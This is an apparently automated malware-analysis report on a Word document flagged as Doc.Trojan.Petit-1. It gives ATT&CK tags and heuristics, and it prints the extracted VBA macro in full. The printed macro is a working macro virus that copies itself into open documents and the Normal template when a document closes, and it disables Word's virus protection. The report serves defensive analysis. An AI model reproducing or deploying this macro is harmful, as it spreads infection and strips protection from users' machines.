MALICIOUS
80
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Petit-1'. It contains VBA macros that are obfuscated but appear to be designed to execute malicious code when the document is closed. The macro code attempts to modify the document's code modules and disable virus protection, suggesting it's a downloader or dropper for further malicious activity.
Heuristics 2
-
ClamAV: Doc.Trojan.Petit-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Petit-1
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 638 bytes |
SHA-256: 898087acb61d2065c0238e69145547da99dd56855b9b218cbd9365563fa52a6e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Close() c = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 13) With Documents(1).VBProject.VBComponents(1).CodeModule .DeleteLines 1, .CountOfLines .AddFromString c End With With NormalTemplate.VBProject.VBComponents(1).CodeModule .DeleteLines 1, .CountOfLines .AddFromString c End With Options.VirusProtection = 0 End Sub 'wm97.Petite by vlam |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.